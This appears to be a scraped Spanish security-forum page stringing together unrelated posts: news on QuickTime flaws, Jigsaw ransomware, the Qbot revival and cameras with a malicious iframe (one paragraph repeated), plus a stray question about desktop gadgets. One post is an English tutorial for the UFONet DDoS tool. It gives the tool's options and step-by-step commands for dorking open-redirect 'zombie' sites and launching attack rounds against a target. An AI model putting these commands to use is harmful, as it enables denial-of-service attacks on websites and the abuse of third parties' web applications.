Dos vulnerabilidades por las que un atacante podría ejecutar código malicioso en el contexto del reproductor QuickTime con el objetivo de tener acceso a nuestros equipos y realizar descargas de archivos de Internet sin que el usuario se dé cuenta cuando abre una página web o archivo malicioso.

Ambas cosas han provocado que la empresa de seguridad recomiende a todos los usuarios de Windows, desinstalar QuickTime de sus equipos inmediatamente si quieren evitar problemas de seguridad. Y es que una vez que estas dos vulnerabilidades, que tienen el nombre de ZDI-16-241 y ZDI-16-242, han sido descubiertas, ya serán muchos los que se estén intentando aprovechar de ellas con ninguna buena intención.

Por su parte, los de Cupertino no han confirmado ni desmentido nada de lo publicado por la compañía de seguridad, pero todo apunta a que más tarde o más pronto realizará un comunicado en el que anuncie el fin del soporte de QuickTime para los usuarios de Windows. De ahí la recomendación por parte de Trend Micro de proceder cuanto antes con la desinstalación del reproductor si eres usuarios de Windows, puesto que las vulnerabilidades parece que no serán solucionadas para este entorno.

Por su parte, los usuarios con sistema operativo de Apple seguirán obteniendo cualquier actualización de seguridad que les proteja de todo este tipo de peligros.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos,

Perdonadme por la ingenuidad, pero me gustaría saber si los gadget de escritorio que muestran las estadisticas del pc consumen muchos recursos, nunca he usado uno.

Me refiero a algo similar a esto:

El ransomware es el tipo de malware más peligroso de los últimos años. Este tipo de malware, por desgracia, fuera de control, cifra los datos de los usuarios y pide el pago de un rescate a los usuarios a cambio de la clave con la que recuperar el acceso a ellos. Los piratas informáticos cada vez buscan nuevas formas de chantajear a los usuarios para que paguen dicho rescate, lo que, finalmente, ha desencadenado en un nuevo ransomware que, tal como temíamos, borra los archivos si no se paga para evitar su recuperación.


Jigsaw es un nuevo ransomware que, como otras variantes similares, cifra todos los datos de los usuarios a los que infecta para, después, pedir el pago de un rescate a cambio de recuperar el acceso a los datos. Este malware reconoce más de 225 tipos de archivos diferentes, utiliza un algoritmo AES para el cifrado y los ficheros resultantes tienen la extensión .fun. Hasta aquí todo correcto, nada diferente con otros malware similares, sin embargo, esto no acaba aquí.

Este ransomware pide el pago de 0.4 Bitcoin (alrededor de 150 euros) por la clave de descifrado. Un pago bastante por debajo que el que piden variantes similares, sin embargo, este ransomware informa de que, cada hora, si no se paga el rescate se eliminarán varios ficheros secuestrados de forma aleatoria. Cada hora que pasa, el ransomware irá eliminando cada vez más archivos, incluso si el usuario reinicia, algunas víctimas reportan que ha llegado a eliminar más de 1000 archivos.

Lo que todos temíamos ha llegado: el primer ransomware que, además de cifrar los datos, los elimina si no paga el rescate a los piratas informáticos. ¿Hasta dónde vamos a llegar?

Los archivos cifrados por Jigsaw se pueden recuperar

Por suerte, las víctimas de Jigsaw aún tienen un pequeño rayo de esperanza, y es que investigadores de seguridad han publicado una sencilla herramienta con la que poder recuperar los datos secuestrados por él.


Esta herramienta, desarrollada por Bleeping Computer, se puede descargar de forma gratuita desde el siguiente enlace. Algunos antivirus la detectan como aplicación sospechosa, pero, igual que el resto de aplicaciones de estos investigadores de seguridad, es totalmente fiable y, además, totalmente efectiva para recuperar los datos de este ransomware.

Como hemos dicho, este es el primer ransomware que, para forzar a los usuarios a pagar cuanto antes, borra los archivos cifrados, perdiéndolos así para siempre. Un hecho más que preocupante ya que, probablemente, otros piratas informáticos comenzarán a incluir dicha característica en sus piezas maliciosas.

Como siempre, y ahora más que nunca, recomendamos crear copias de seguridad de todos los archivos importantes y guardarlas estas en un disco o unidad desconectada del ordenador de manera que, si caemos víctimas de este u otro ransomware, podamos recuperar los datos sin pagar.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un grupo de expertos en seguridad de BAE Systems ha desvelado que una versión renovada y mejorada del malware Qbot está de vuelta. Seguramente a muchos este malware ya les sonará, puesto que apareció por primera vez en 2009 para ser posteriormente detectado por Symantec.

Un malware que también es conocido como Qakbot y que se encarga de robar datos o información de los equipos infectados. Pues bien, casi siete años después Qbot ha reaparecido y aunque se trata de una variante mejorada, deriva directamente del código fuente original de Qbot.


Y es que ahora este malware, además de contar con las capacidades que ya tenía en 2009, donde ya era un gusano capaz de robar datos de los equipos infectados con capacidades de puerta trasera, llega con nuevas características en las que destaca una técnica de evasión avanzada.

Esto significa que el propio malware puede detectar si está siendo observado o seguido en un sandbox, herramienta usada por los investigadores para detectar amenazas antes de que comiencen a causar daños a los usuarios. Esto hace que la nueva versión de Qbot sea aún más peligrosa, puesto que puede distribuirse rápidamente antes de que pueda ser detectado por este tipo de herramientas. Algo que ha sido conseguido gracias a un código polimórfico que hace que sea más difícil de detectar.

De esta manera, según se detalla en un informe elaborado por los investigadores de BAE Systems, este malware ya ha conseguido infectar a más de 54 millones de ordenadores en miles de organizaciones y a usuarios de todo el mundo, aunque el mayor porcentaje de afectados es de Estados Unidos.

Los ciberdelincuentes responsables de esta nueva oleada de Qbot se han fijado como principales objetivos algunas organizaciones públicas, departamentos de policía, hospitales o universidades entre otros. Aunque este gusano es capaz de infectar a ordenadores con cualquier versión del sistema operativo Windows, especialmente ha demostrado hacer daño a aquellos que cuenta con Windows XP, puesto que ha provocado que no se puedan reiniciar nuevamente.

Este malware parece que se está distribuyendo a través de numerosos sitios web comprometidos y gracias a su capacidad de ir cambiando para evadir el software utilizado para su detección por parte de los investigadores, la amenaza se está extendiendo rápidamente, consiguiendo afectar a un gran número de equipos.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

You can read this post on spanish language: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Maybe a lot of people know about this tool, but i don´t found nothing about it on the forum, and it is the reason of this post.

Briefly, UFONet is a DDoS tool, that exploit the Open Redirect vulnerability on third party web applications like botnet.
The Open Redirect vulnerability allows the attacker to perform redirection to the target that he choose, because that redirection is on a variable that the user can control.

I think that this tool is curious and easy to use, it found a useful  and creative way to exploit Open Redirect vulnerability.


--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: 'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:
    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT                                           Search for biggest file (ex: -i 'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s):No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')


Attack method:

#Searching for 'zombies':

For perform DDoS attack using UFONet, first of all we must collect websites that are vulnerable to Open Redirect (zombies). For it, we must use specific Dorks. The tool include a wordlist called dorks.txt where we can find some useful parameters such as "proxy.php? Url =" or "validator? Uri =".

-Search by parameter:

./ufonet -s 'proxy.php?url='

-Search by dorks list:

./ufonet -s 'proxy.php?url='

-Select search engine between google, duck, yahoo, yandex y bing:

./ufonet -s 'proxy.php?url=' --se 'bing'

-Select all search engine:

./ufonet -s 'proxy.php?url=' --sa 

-Control how many 'zombies' recieve from search engines you can use:

  ./ufonet --sd 'dorks.txt' --sa --sn 20

-At the end of the process, you will be asked if you want to check the list retrieved to see
  if the urls are vulnerable:

 Wanna check if they are valid zombies? (Y/n)

- Also, you will be asked to update the list adding automatically only 'vulnerable' web apps:

Wanna update your list (Y/n)

#Testing botnet:

-Launch test:

 ./ufonet -t zombies.txt

-Order to 'zombies' to attack you:

 ./ufonet --attack-me 

#Inspecting a target:

-This feature will provides you the biggest file on target:

./ufonet -i http://target.com

- You can use this when attacking to be more effective:

./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

#Attacking a target:

-Enter a target to attack with a number of rounds (1 round by default):

./ufonet -a http://target.com -r 10

These are the basic options of UFONet, it have more advanced functions like use proxy. Is possible to use the tool with a GUI wiht the command:

./ufonet --gui

Spanish post: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Official site: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Regards, hati 

El experto en seguridad Mike Olsen ha avisado de la presencia de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Olsen ha estado buscando cámaras de vigilancia que quería comprar para la casa de un amigo, encontrando una interesante oferta en Amazon para adquirir seis cámaras PoE para exteriores y un equipo de grabación.



Una vez en posesión de las cámaras, instaló el software de control en el ordenador de su amigo, al cual accedió a través de la página web de administrador que incorpora. Olsen vio que podía ver la alimentación de las cámaras, pero ninguno de los controles y configuraciones normales de este tipo de productos.

Olsen se puso a comprobar a través de las herramientas para desarrolladores del navegador si había algún fallo en el código HTML o CSS que estuviese provocando el error, encontrando una etiqueta correspondiente a un iframe de HTML que enlazaba a un sitio web sospechoso.


Una vez en posesión de las cámaras, instaló el software de control en el ordenador de su amigo, al cual accedió a través de la página web de administrador que incorpora. Olsen vio que podía ver la alimentación de las cámaras, pero ninguno de los controles y configuraciones normales de este tipo de productos.

Olsen se puso a comprobar a través de las herramientas para desarrolladores del navegador si había algún fallo en el código HTML o CSS que estuviese provocando el error, encontrando una etiqueta correspondiente a un iframe de HTML que enlazaba a un sitio web sospechoso.


El investigador encontró la URL No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que le resultó bastante sospechosa. Tras investigarla en Google comprobó que correspondía a un dominio malicioso utilizado para actividades fraudulentas, incluyendo ataques basados en malware, siendo este un dato que ha sido confirmado tanto por Virus Total como Sucuri. Olsen decidió avisar en su blog de los peligros de este producto porque por entonces tenía una buena valoración (por suerte tras destaparse esto ha caído en picado) y está a buen precio.

Tristemente este caso no es único, porque un usuario ha encontrado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta